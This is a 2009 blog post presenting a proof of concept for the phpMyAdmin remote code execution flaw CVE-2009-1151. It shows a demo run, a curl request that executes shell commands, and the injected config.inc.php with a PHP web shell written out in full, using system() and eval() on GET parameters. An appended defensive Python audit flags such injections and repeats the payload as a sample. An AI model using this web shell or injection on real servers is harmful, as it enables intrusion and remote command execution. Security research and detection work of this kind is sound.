
06-09-2009 21:03
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept

I couldn’t find any public PoC/exploit for this phpMyAdmin vulnerability, despite it being a serious bug affecting a popular open-source project.

I think this vulnerability is a nice reminder that it’s still possible to perform remote command execution these days without relying on SQL injection (e.g. xp_cmdshell) or a memory corruption bug (e.g. heap overflow).

All the documentation you need is in the script comments. I recommend you go through it before you actually run the script.

After reading the public advisory and patched code, and playing around for a while, I managed to have a working PoC bash script. The script will allow you to remotely run shell commands and PHP code against vulnerable targets. Although in principle the vulnerability sounds quite simple, it actually took me a while to go from advisory to working attack code.

I’m providing the script with the hope that it will help pentesters and security researchers. Please only test the script against your own systems, or systems you have been given permission to pentest! Don’t be evil, it’s not worth it.

Demo

    $ ./phpMyAdminRCE.sh
    usage: ./phpMyAdminRCE.sh
    i.e.: ./phpMyAdminRCE.sh http://target.tld/phpMyAdmin/

    $ ./phpMyAdminRCE.sh http://172.16.211.10/phpMyAdmin-3.0.1.1/
    [+] checking if phpMyAdmin exists on URL provided ...
    [+] phpMyAdmin cookie and form token received successfully. Good!
    [+] attempting to inject phpinfo() ...
    [+] success! phpinfo() injected successfully! output saved on /tmp/phpMyAdminRCE.sh.9217.phpinfo.flag.html
    [+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
    http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/
    http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?p=phpinfo();
    please send any feedback/improvements for this script to unknown.pentestergmail.com

    $ curl "http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/"
    total 96
    drwxr-xr-x 2 root root 4096 Mar 11 10:12 bin
    drwxr-xr-x 3 root root 4096 May 6 10:01 boot
    lrwxrwxrwx 1 root root 11 Oct 12 2008 cdrom -> media/cdrom
    drwxr-xr-x 15 root root 14300 Jun 5 09:02 dev
    drwxr-xr-x 147 root root 12288 Jun 5 09:02 etc
    drwxr-xr-x 3 root root 4096 Oct 18 2008 home
    drwxr-xr-x 2 root root 4096 Jul 2 2008 initrd
    [partial output removed for brevity reasons]

Contents of /config/config.inc.php after our evil code has been successfully injected (injected code shown in bold):

    <?php
    /*
     * Generated configuration file
     * Generated by: phpMyAdmin 3.0.1.1 setup script by Michal Čihař <michal@cihar.com>
     * Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $
     * Date: Tue, 09 Jun 2009 14:13:34 GMT
     */

    /* Servers configuration */
    $i = 0;

    /* Server (config:root) [1] */
    $i++;
    $cfg['Servers'][$i]['host']=''; if($_GET['c']){echo '<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo '<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';
    $cfg['Servers'][$i]['extension'] = 'mysqli';
    $cfg['Servers'][$i]['connect_type'] = 'tcp';
    $cfg['Servers'][$i]['compress'] = false;
    $cfg['Servers'][$i]['auth_type'] = 'config';
    $cfg['Servers'][$i]['user'] = 'root';

    /* End of servers configuration */

    ?>

Thanks

I’d like to thank Greg Ose for discovering such a cool vuln and doing a nice writeup about the technical details! Also big thanks to str0ke for testing this PoC script and providing such useful feedback!
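
An added example, not part of the original post or of phpMyAdmin: a defender-side check that flags this kind of injection in a setup-generated config.inc.php by allowlisting the simple lines such a file is expected to contain. The allowed grammar, the function names and the sample file are assumptions modelled on the listing above.

```python
import re

# Assumed grammar of a setup-generated config.inc.php, based on the sample on
# this page: PHP tags, the $i counter, and scalar $cfg[...] assignments only.
_KEY = r"(?:\[(?:'[A-Za-z0-9_]+'|\$i)\])+"
_VALUE = r"(?:'(?:[^'\\]|\\.)*'|true|false|null|-?\d+)"
_ALLOWED = re.compile(
    r"^(?:<\?php|\?>|\$i\s*=\s*0;|\$i\+\+;|\$cfg" + _KEY + r"\s*=\s*" + _VALUE + r";)$")
_DANGEROUS = re.compile(
    r"\$_(?:GET|POST|REQUEST|COOKIE)\b"
    r"|\b(?:eval|system|exec|passthru|shell_exec|popen|proc_open)\s*\(", re.I)

def strip_block_comments(text):
    """Blank out /* ... */ comments while keeping line numbers stable."""
    return re.sub(r"/\*.*?\*/", lambda m: "\n" * m.group(0).count("\n"), text, flags=re.S)

def audit_config(text):
    """Return (line_no, reason, line) for each line outside the expected grammar."""
    findings = []
    for no, raw in enumerate(strip_block_comments(text).splitlines(), 1):
        line = raw.strip()
        if not line or _ALLOWED.match(line):
            continue
        reason = ("code execution primitive" if _DANGEROUS.search(line)
                  else "unexpected statement")
        findings.append((no, reason, line))
    return findings

# Constructed sample, modelled on the config.inc.php shown on this page.
_TEMPLATE = """<?php
/*
 * Generated configuration file
 */
$i = 0;
/* Server (config:root) [1] */
$i++;
%s
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['compress'] = false;
?>
"""
CLEAN = _TEMPLATE % "$cfg['Servers'][$i]['host'] = 'localhost';"
INJECTED = _TEMPLATE % ("$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo '<pre>';"
                        "system($_GET['c']);echo '</pre>';};//'] = 'localhost';")

if __name__ == "__main__":
    for no, reason, line in audit_config(INJECTED):
        print(f"line {no}: {reason}: {line}")
```

Because the check allowlists the expected line shapes instead of searching for known payloads, any trailing statement after the first assignment on a line is reported even when it uses no listed function.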
